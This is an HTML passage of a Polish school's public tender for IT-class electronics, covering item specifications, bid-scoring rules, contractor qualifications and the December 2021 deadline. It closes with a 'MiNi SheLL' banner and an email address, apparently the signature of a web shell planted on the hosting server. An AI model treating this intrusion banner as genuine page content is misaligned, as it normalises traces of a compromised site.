uwzględnieniu powyższych kryteriów.<br/>5.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>6.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>7.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Jeżeli Zamawiający nie będzie prowadził negocjacji, dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu ofert. <br/>8.	Zamawiający poprawia w ofercie:<br/>1)	oczywiste omyłki pisarskie,<br/>2)	oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek,<br/>3)	inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty,<br/>– niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE II – Sprzęt elektroniczny do realizacji zajęć informatycznych <br/>1. Dysk zewnętrzny HDD + etui - 6 kompletów	Specyfikacja urządzenia:<br/>•	Dysk zewnętrzny HDD (min. 1 TB; 2.5&#34;), <br/>•	USB 3.0; min. 5400 obr./min.,<br/>•	kolor czarny,<br/>•	przewód USB 3.0 + etui w sztywnej obudowie dobrze zabezpieczającej dysk.<br/>2. Switch zarządzalny 24-portowy - 1 szt.	•	Switch zarządzalny w obudowie Rack; <br/>•	24 porty GigabitEthernet; <br/>•	możliwość zarządzania przez przeglądarkę i przez dołączony program, który umożliwia zarządzanie urządzeniem na poziomie warstwy 2 modelu ISO/OSI, <br/>•	łączenie się ze switchem przez adres MAC przełącznika.<br/>3. Mikser video RGBLink Mini do transmisji Live Specyfikacja urządzenia:<br/>•	transmisja na żywo umożliwiający miksowanie wielu źródeł wideo <br/>•	komunikacja z komputerem za pomocą portu USB 3.0 <br/>•	instalacja typu Plug&amp;Play intuicyjny interfejs i duże przyciski funkcja T-bar <br/>•	kompaktowa konstrukcja obsługa Picture-In-Picture kompatybilność z Facebook, YouTube, Zoom, MS Teams itp. <br/>•	wejście: 4x HDMI-A <br/>•	wyjście: 1x HDMI-A, <br/>•	1x USB-A <br/>•	dźwięk: 1x wejście/wyjście mini jack 3,5 mm<br/>•	sieć: 1x RJ45 LAN <br/>•	zasilanie: DC 12 V / 1,5 A max. 18 W.<br/>4. Statyw + pilot uchwyt na telefon Specyfikacja urządzenia:<br/>•	zasilanie pilota: bateria CR 2032 3V (w zestawie) <br/>•	wymiary statywu (wysokość min/max): 45-135cm<br/>•	szerokość uchwytu na telefon (min/max): 55/85mm <br/>•	gwint: 1/4”<br/>•	w zestawie statywu uchwyt na telefon pilot – zdalny wyzwalacz.<br/>5. Lampa pierścieniowa do zdjęć na statywie Zawartość zestawu: <br/>•	lampa pierścieniowa – 1 szt., <br/>•	regulowany teleskopowy statyw – 1 szt., <br/>•	uchwyt na telefon – 1 szt., <br/>•	przewód zasilania– 1 szt.<br/>•	źródło światła: LED<br/>•	liczba źródeł światła: 1 szt.<br/>6. RYSIK Zawartość zestawu: <br/>•	rysik – 1 szt., <br/>•	kabel USB do ładowania – 1 szt., <br/>•	rodzaj złącza: Micro USB, <br/>•	czas pracy bez ładowania – min. 10 godzin. <br/>7. Router z WiFi - 2 sztuki	Specyfikacja urządzenia:<br/>•	system Android z możliwością aktualizacji do najnowszej wersji, <br/>•	4GB RAM, <br/>•	pamięć wewnętrzna 64GB, <br/>•	procesor 8-rdzeniowy, <br/>•	bateria min. 6000mAh, <br/>•	etui z możliwością ustawienia tabletu na stole, <br/>•	dobra rozdzielczość stwarzająca możliwość wykorzystania jako tablet graficzny, z odpowiednim rysikiem w zestawie,<br/>•	komunikacja Wi-Fi 802.11 a/b/g/n/ac, <br/>•	Bluetooth 5.0, <br/>•	Moduł GPS,<br/>•	złącze USB, <br/>•	złącze słuchawkowe, <br/>•	przekątna matrycy: min. 10 cali.<br/>8. Soundbar Specyfikacja urządzenia:<br/>•	połączenie Bluetooth, <br/>•	wysoka moc 40W RMS, <br/>•	złącze USB, <br/>•	sterowanie za pomocą pilota. <br/>9. Switch gabinetowy jednoportowy	Specyfikacja urządzenia:<br/>•	Switch 10/100/1000 Mb/s <br/>•	48-port + 4 Combo Gb/SFP. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162000-5 - Pomoce naukowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31710000-6 - Sprzęt elektroniczny</p> <p class="mb-0">34999400-0 - Modele w skali</p> <p class="mb-0">48520000-9 - Pakiety oprogramowania multimedialnego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>Dla każdej z części:<br/><br/>1)	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/><br/>Nr	Nazwa kryterium	Waga<br/>1	Cena ofertowa brutto	60%<br/>2	Gwarancja	20%<br/>3	Termin wykonania dostawy	20 %<br/><br/>2)	Punkty przyznawane za podane wyżej kryteria będą liczone według następujących wzorów:<br/><br/>Nr kryterium	Wzór<br/>1	Cena ofertowa brutto<br/>Liczba punktów = (Cnajniższa/Cof) 60 waga<br/>gdzie:<br/> - C najniższa - najniższa cena spośród wszystkich ofert<br/> - C of - cena podana w ofercie<br/>2	Gwarancja 20 waga<br/>3	Termin wykonania dostawy 20 waga<br/><br/>UWAGA! Pkt 1 ppkt 2<br/>Punkty w kryterium gwarancja zostaną przyznane według następujących zasad:<br/>- okres gwarancji minimum 24 miesiące – oferta otrzyma 0 pkt<br/>- okres gwarancji ponad wymaganie minimum (24 miesięcy) tj. na okres 36 miesięcy (dodatkowo 12 miesięcy) – oferta otrzyma 10 pkt;<br/>- okres gwarancji ponad wymaganie minimum (24 miesięcy) tj. na okres 48 miesięcy (dodatkowo 24 miesiące) – oferta otrzyma 20 pkt;<br/>Jeżeli Wykonawca zaproponuje gwarancję powyżej 48 miesięcy, to Zamawiający przyjmie maksymalny okres gwarancji 48 miesięcy.<br/>Maksymalna liczba punktów jaką może uzyskać Wykonawca w kryterium gwarancja wynosi 20 punktów.<br/><br/>UWAGA! Pkt 1 ppkt 3<br/>Sposób przyznawania punktów w kryterium Termin wykonania dostawy<br/>- termin wykonania dostawy do 30 dni – Oferta otrzyma 0 pkt<br/>- termin wykonania dostawy do 25 dni – Oferta otrzyma 10 pkt<br/>- termin wykonania dostawy do 20 dni – Oferta otrzyma 15 pkt<br/>- termin wykonania dostawy do 15 dni – Oferta otrzyma 20 pkt<br/><br/>Maksymalna liczba punktów jaką może uzyskać Wykonawca w kryterium Termin wykonania dostawy wynosi 20 punktów.<br/><br/>2.	Łączna ilość punktów dla badanej oferty będzie liczona wg następującego wzoru:<br/>S = C + G + T<br/>gdzie: S – łączna suma punktów badanej oferty<br/> C – cena ofertowa brutto<br/> G – gwarancja <br/> T – termin wykonania dostawy<br/> <br/>3.	Ocena punktowa będzie dotyczyć wyłącznie ofert uznanych za ważne i nie podlegających odrzuceniu. Danych z ofert uznanych za nieważne nie bierze się pod uwagę przy obliczaniu punktacji.<br/>4.	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów przy uwzględnieniu powyższych kryteriów.<br/>5.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>6.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>7.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Jeżeli Zamawiający nie będzie prowadził negocjacji, dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu ofert. <br/>8.	Zamawiający poprawia w ofercie:<br/>1)	oczywiste omyłki pisarskie,<br/>2)	oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek,<br/>3)	inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty,<br/>– niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>2.1.	Zdolność do występowania w obrocie gospodarczym (dotyczy każdej części zamówienia):<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.2.	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów (dotyczy każdej części zamówienia):<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.3.	Sytuacja ekonomiczna lub finansowa (dotyczy każdej części zamówienia):<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.4. Zdolności technicznej lub zawodowej (dotyczy każdej części zamówienia):<br/>2.4.1. Warunek zostanie spełniony, jeśli: Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie, wykonywał co najmniej jedną dostawę wyposażenia lub sprzętu o wartości nie mniejszej niż 1.000,00 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania braku podstaw (przesłanek) wykluczenia z postępowania, na podstawie art. 274 ust. 1 ustawy zostanie wezwany do złożenia następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/>oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 3 do SWZ;<br/><br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie w zakresie pkt 3.1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3.2.	Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełniania warunków udziału w postępowaniu (określonych przez Zamawiającego w ust. 2 niniejszego pkt SWZ), na podstawie art. 274 ust. 1 ustawy zostanie wezwany do złożenia następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/>a)	W celu wykazania spełniania warunku z pkt 2.4.1.:<br/>3.2.1.	Wykazu dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie zgodnie z załącznikiem Nr 4 do SWZ. <br/>Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> XII.	Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia (dotyczy każdej części zamówienia)<br/>1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we Wzorze umowy, stanowiących Załączniki nr 6A i 6B do SWZ.<br/>2.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty, w zakresie uregulowanym w art. 454-455 ustawy PZP oraz wskazanym we Wzorze umowy, stanowiących Załączniki nr 6A i 6B do SWZ.<br/>4.	Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/sp_sztum</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-14 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com